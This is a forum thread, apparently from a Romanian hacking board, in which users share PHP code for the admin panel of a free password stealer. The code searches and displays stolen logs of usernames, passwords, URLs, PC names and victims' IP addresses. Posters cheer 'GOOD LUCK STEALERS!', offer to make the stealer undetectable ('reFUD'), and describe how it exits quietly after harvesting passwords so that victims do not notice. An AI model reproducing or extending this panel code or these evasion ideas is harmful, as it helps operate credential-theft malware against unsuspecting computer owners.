Jump to content
Byte-ul

Coailii Password Recovery

Recommended Posts

Fix pentru search:

Deschideti search.php cu un editor,

dati replace de la <?php pana la primul ?> cu:


<?php
if ($_GET['delete-id']) {

$id = (int) $_GET["delete-id"];

$query = mysql_query("DELETE FROM `data` where id='$id'");

echo "<br /><center>The log was removed successfully</center><br />";

echo "<meta http-equiv=Refresh content=2;url=dashboard.php>";

}
function clear($str) {
$clear = mysql_escape_string(htmlentities($str, ENT_QUOTES));
return $clear;
}
$keyword = $_GET['keyword'];
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE url LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$row = mysql_fetch_assoc($result);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
for($i=0;$i<$num;$i++) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';
}
echo '</table>';
}
}
?>

Dati save, urcati fisierul la loc pe host si gata.

rvrwkP4.png

Si ca sa aliniati sidebarul cu "contentul", intrati in header.php, cautati <div class="col-sm-3 col-md-2 sidebar"> si dati replace cu <div class="col-sm-3 col-md-2 sidebar" style="margin: 1.7% 0;"> si gata.

Edited by askwrite
  • Downvote 1
Link to post
Share on other sites

This is a fully working FIX for your search.php script. I repaired all the errors, and it doesn't repeat only the first one on the query on logs. I ALSO added "Search By:" paragraph that can search with URL,PC-NAME,IP,USER,PASS,IP and even a application!

GOOD LUCK STEALERS!

<?php
require_once 'header.php';
head();
?>
<!--/span-->
<div class="col-sm-9 col-md-9">

<div class="row-fluid">
<!-- block -->
<br><div class="block">
<div class="navbar navbar-inner" role="navigation">
<div class="navbar-header">
<a class="navbar-brand">Search logs (URL Only)</a>
</div>
</div>
<div class="block-content collapse in">
<div class="span12">
<form action="search.php" method="get">
<p>
<label>URL:</label>
<input name="keyword" type="text" value="">
<label>Search By:</label>
<select name="select">
<option value="URL">URL</option>
<option value="pcname">PC-NAME</option>
<option value="username">Username</option>
<option value="password">Password</option>
<option value="ip">IP</option>
<option value="app">Application</option>
</select>
</p>
<br><input type="submit" class="btn btn-default" value="Search"/>
</form>
<?php
if (@$_GET['delete-id']) {

$id = (int) $_GET["delete-id"];

$query = mysql_query("DELETE FROM `data` where id='$id'");

echo "<br /><center>The log was removed successfully</center><br />";

echo "<meta http-equiv=Refresh content=2;url=dashboard.php>";

}
function clear($str) {
$clear = mysql_real_escape_string(htmlentities($str, ENT_QUOTES));
return $clear;
}
@$keyword = $_GET['keyword'];
@$selectable=$_GET['select'];
switch ($selectable)
{
case "URL":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE url LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
break;
}
case "pcname":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE pc_name LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
break;
}
case "username":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE user LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
break;
}
case "password":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE pass LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
break;
}
case "ip":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE ip LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
break;
}
case "app":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE app LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
break;
}
}
?>



<hr />
</div>
</div>
</div>
<!-- /block -->
</div>

<?php
footer();
?>

For the creator of this project, if you need any help programming/reFUD the stealer or for beta testing please write me a PM.

Edited by zbeta
  • Downvote 1
Link to post
Share on other sites
This is a fully working FIX for your search.php script. I repaired all the errors, and it doesn't repeat only the first one on the query on logs. I ALSO added "Search By:" paragraph that can search with URL,PC-NAME,IP,USER,PASS,IP and even a application!

GOOD LUCK STEALERS!

<?php
require_once 'header.php';
head();
?>
<!--/span-->
<div class="col-sm-9 col-md-9">

<div class="row-fluid">
<!-- block -->
<br><div class="block">
<div class="navbar navbar-inner" role="navigation">
<div class="navbar-header">
<a class="navbar-brand">Search logs (URL Only)</a>
</div>
</div>
<div class="block-content collapse in">
<div class="span12">
<form action="search.php" method="get">
<p>
<label>URL:</label>
<input name="keyword" type="text" value="">
<label>Search By:</label>
<select name="select">
<option value="URL">URL</option>
<option value="pcname">PC-NAME</option>
<option value="username">Username</option>
<option value="password">Password</option>
<option value="ip">IP</option>
<option value="app">Application</option>
</select>
</p>
<br><input type="submit" class="btn btn-default" value="Search"/>
</form>
<?php
if (@$_GET['delete-id']) {

$id = (int) $_GET["delete-id"];

$query = mysql_query("DELETE FROM `data` where id='$id'");

echo "<br /><center>The log was removed successfully</center><br />";

echo "<meta http-equiv=Refresh content=2;url=dashboard.php>";

}
function clear($str) {
$clear = mysql_real_escape_string(htmlentities($str, ENT_QUOTES));
return $clear;
}
@$keyword = $_GET['keyword'];
@$selectable=$_GET['select'];
switch ($selectable)
{
case "URL":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE url LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a rel="nofollow" href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
}
case "pcname":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE pc_name LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a rel="nofollow" href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
}
case "username":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE user LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a rel="nofollow" href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
}
case "password":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE pass LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a rel="nofollow" href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
}
case "ip":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE ip LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a rel="nofollow" href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
}
case "app":
if (!empty($keyword)) {
$clearstr = clear($keyword);
$sql = "SELECT * FROM data WHERE app LIKE '%$clearstr%' ORDER BY id DESC";
$result = mysql_query($sql);
$num = mysql_num_rows($result);
if ($num == 0) {
echo 'There are no logs';
} else {
echo '<p>' . $num . ' results were found for your search</p>';
echo '
<table class="table table-bordered table-striped table-hover">
<tr>
<th>App</th>
<th>URL</th>
<th>Username</th>
<th>Password</th>
<th>PC Name</th>
<th>IP</th>
<th>Time</th>
</tr>';
while($row = mysql_fetch_assoc($result)) {
echo '
<tr class="even">
<td><center><img src="icons/' . $row['app'] . '" width="25" height="25"</img></center></td>
<td>' . $row['url'] . '</td>
<td>' . $row['user'] . '</td>
<td>' . $row['pass'] . '</td>
<td>' . $row['pc_name'] . '</td>
<td>' . $row['ip'] . '</td>
<td>' . $row['time'] . '</td>
<td>
<a rel="nofollow" href="?delete-id=' . $row['id'] . '" class="btn btn-danger"><i class="icon-remove icon-white"></i> Delete</a>
</td>
</tr>';

}
echo '</table>';
}
}
}
?>



<hr />
</div>
</div>
</div>
<!-- /block -->
</div>

<?php
footer();
?>

For the creator of this project, if you need any help programming/reFUD the stealer or for beta testing please write me a PM.

cea ce a facut tipul asta e bun? nu am vazut nimic suspect dar nu-s expert

Link to post
Share on other sites

If I understand good, becouse I'm not from Romania. Why did I do this? Well I found this great stealer for free, while there are no other stealers that still work for free at all, so I got a thought why not help for this project to be better? Anyway I'm using it and its a lot better with search included.

Link to post
Share on other sites
hi man, thanks a lot for your hard work... why is this the only info I get? Also I noticed that after you run the .exe stealer on the target machine, the process ends after a few seconds...

j7eqkk.png

The process scan for all passwords on the target PC and after it finishes it ends the process to not look like the pc is infected with virus. It's meant to end the process, its not an error.

Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...